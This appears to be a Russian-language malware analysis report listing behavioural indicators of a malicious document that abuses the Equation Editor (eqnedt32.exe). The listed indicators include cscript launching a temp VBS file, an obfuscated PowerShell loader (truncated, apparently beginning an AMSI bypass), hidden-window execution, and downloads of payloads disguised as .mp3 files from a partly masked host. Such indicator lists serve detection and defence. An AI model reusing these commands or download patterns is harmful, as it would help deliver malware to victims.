Техническая информация
- '%WINDIR%\syswow64\cscript.exe' %TEMP%\pgg.vbs AC
- '%WINDIR%\syswow64\cmd.exe' /C cscript %tmp%\pgg.vbs AC
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $8B2BF37928A5286BE50E6D7DA387A36E50F1D96F1E7B0E51DBF44443896D794547E7BE35F461E437B1DA2A396F436F2B1D=@(40,36,97,32,61,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,1...
- %TEMP%\pgg.vbs
- http://te###ik.com.hk/system/storage/download/st.mp3
- http://te###ik.com.hk/system/storage/download/text.mp3
- DNS ASK te###ik.com.hk
- '%WINDIR%\syswow64\cmd.exe' /C cscript %tmp%\pgg.vbs AC' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $8B2BF37928A5286BE50E6D7DA387A36E50F1D96F1E7B0E51DBF44443896D794547E7BE35F461E437B1DA2A396F436F2B1D=@(40,36,97,32,61,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,1...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\svchost.exe' -k DcomLaunch -p -s PlugPlay
- '%WINDIR%\syswow64\cmd.exe' /c sc query wcncsvc >> AC